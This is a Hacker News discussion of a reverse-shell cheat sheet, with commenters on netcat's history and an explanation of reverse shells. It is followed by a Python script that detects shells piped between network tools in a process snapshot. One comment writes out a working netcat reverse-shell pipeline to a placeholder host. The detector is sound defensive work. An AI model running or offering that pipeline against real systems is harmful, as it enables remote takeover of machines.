
Reverse Shell Cheat Sheet

47 points | Cieplak | 12 years ago | pentestmonkey.net

6 comments

gwu78 | 12 years ago
"... wrong version of netcat"

There's only one true netcat. Although there was at least one revision of the original by the author to add some minor fixes and the hexdump feature, as I remember it, the "doexec()" or "-e" feature was in all versions. But I could be wrong as I did not start using the program before he had already revised it once. Any HN readers out there who were using netcat from the beginning?

To enable doexec() you need to define an aptly-named macro called "GAPING_SECURITY_HOLE". Original netcat does not have -e by default.

IMO, netcat is a beautiful, elegant example of useful code, fitting in a single source file, well-commented, with a good sense of humor, and able to compile with almost no modification on all varieties of UNIX from the mid 1990's to today. That ability to compile quickly and smoothly, year after year, is what puts netcat among my favorite programs.

I cannot say the same for most of the netcat imitations that followed the original, which are usually loaded with needless additional "features" not to mention less portable.

rlx0x | 12 years ago
I would recommend socat; it supports IPv6 and SSL for reverse shells.
malkia | 12 years ago
What is a reverse shell?
DaCapoo | 12 years ago
Typically, when you open a secure shell (SSH) connection your client is connecting to an SSH server running on the target machine. A reverse shell occurs when the server initiates a connection with a client that is listening - for example, you have access to a shell to run commands on a target computer (usually through a command injection vulnerability in a website). This means you don't have a full shell - just the ability to run arbitrary commands.

You open a reverse shell which instructs your target computer, which is running an SSH server, to connect to your client, which allows you to now have a full featured shell at your hands.

effdee | 12 years ago
Normally you connect to a remote system and run a shell there (e.g. via SSH). This usually requires some sort of authentication.

If you cannot authenticate yourself (like, because you're an evil hacker) but found a way to run code on the remote system, you can do the reverse: have the remote system connect back to you.

The "classic way" to do this is to run two instances of netcat in listening mode on your machine:

  terminal1> nc -l 8001

  terminal2> nc -l 8002

Then you run something like this on the remote system:

  nc your.machine 8001 | /bin/sh | nc your.machine 8002

Now you can enter commands in terminal1 and see their output in terminal2.
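The pipeline effdee describes leaves a recognisable footprint on the host: a shell whose stdin is a pipe written by a network tool and whose stdout is a pipe read by another network tool, with no terminal anywhere in the chain. The script below, an added example and not code from the thread or from pentestmonkey.net, shows how a defender can spot that shape (and the simpler "shell bound straight to a socket" shape) in a process snapshot. The snapshot format (pid, ppid, readlink targets of fd 0 and fd 1, then the command line) is a constructed stand-in for what you would collect from /proc/<pid>/fd, and the sample records, the tool and shell name sets, and the function names are all assumptions made for this example.

```python
"""Flag shells that are wired into a network tool pipe chain (constructed example)."""
from dataclasses import dataclass
import os

# Assumed name sets; extend to match the tooling present on your hosts.
NETWORK_TOOLS = {"nc", "ncat", "netcat", "socat"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed snapshot: "pid ppid fd0_target fd1_target cmdline".
# Targets mimic readlink(/proc/<pid>/fd/N): pipe:[N], socket:[N], /dev/pts/N, /dev/null.
SAMPLE_SNAPSHOT = """
1    0    /dev/null    /dev/null    /sbin/init
812  1    /dev/null    pipe:[70]    /usr/sbin/apache2 -k start
2201 812  /dev/null    pipe:[9001]  nc your.machine 8001
2202 812  pipe:[9001]  pipe:[9002]  /bin/sh
2203 812  pipe:[9002]  /dev/null    nc your.machine 8002
3100 3000 /dev/pts/0   /dev/pts/0   bash
3150 3100 /dev/pts/0   pipe:[9100]  ls -l
3151 3100 pipe:[9100]  /dev/pts/0   less
4000 1    socket:[5100] socket:[5100] /bin/sh
"""


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    stdin: str   # readlink target of fd 0
    stdout: str  # readlink target of fd 1
    cmdline: str


def parse_snapshot(text):
    """Parse the whitespace-separated snapshot; the command line keeps its spaces."""
    procs = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pid, ppid, fd0, fd1, cmdline = line.split(None, 4)
        procs.append(Proc(int(pid), int(ppid), fd0, fd1, cmdline))
    return procs


def program_name(cmdline):
    """'/bin/sh -c foo' -> 'sh'; 'nc host 8001' -> 'nc'."""
    return os.path.basename(cmdline.split()[0])


def is_shell(p):
    return program_name(p.cmdline) in SHELLS


def is_network_tool(p):
    return program_name(p.cmdline) in NETWORK_TOOLS


def is_pipe(target):
    return target.startswith("pipe:[")


def is_socket(target):
    return target.startswith("socket:[")


def find_pipe_chained_shells(procs):
    """Shell whose stdin pipe is written by a network tool and whose stdout
    pipe is read by one: the 'nc | /bin/sh | nc' shape."""
    writers = {p.stdout: p for p in procs if is_pipe(p.stdout)}  # pipe id -> writer
    readers = {p.stdin: p for p in procs if is_pipe(p.stdin)}    # pipe id -> reader
    findings = []
    for sh in procs:
        if not is_shell(sh):
            continue
        upstream = writers.get(sh.stdin)
        downstream = readers.get(sh.stdout)
        if upstream and downstream and is_network_tool(upstream) and is_network_tool(downstream):
            findings.append({"kind": "pipe_chained_shell", "shell_pid": sh.pid,
                             "upstream_pid": upstream.pid, "downstream_pid": downstream.pid})
    return findings


def find_socket_bound_shells(procs):
    """Shell with a socket directly on stdin or stdout (no pty in between)."""
    return [{"kind": "socket_bound_shell", "shell_pid": p.pid}
            for p in procs if is_shell(p) and (is_socket(p.stdin) or is_socket(p.stdout))]


def analyze(text):
    procs = parse_snapshot(text)
    return sorted(find_pipe_chained_shells(procs) + find_socket_bound_shells(procs),
                  key=lambda f: f["shell_pid"])


if __name__ == "__main__":
    for finding in analyze(SAMPLE_SNAPSHOT):
        print(finding)
```

The interactive `ls -l | less` pipeline is left alone because neither end is a network tool and both are anchored to a pty, which is the main false-positive class such a rule has to sidestep. A real collector would feed `analyze` live `/proc` data and would also want to record the parent (here pid 812, the web server) since that is what points at the injection point.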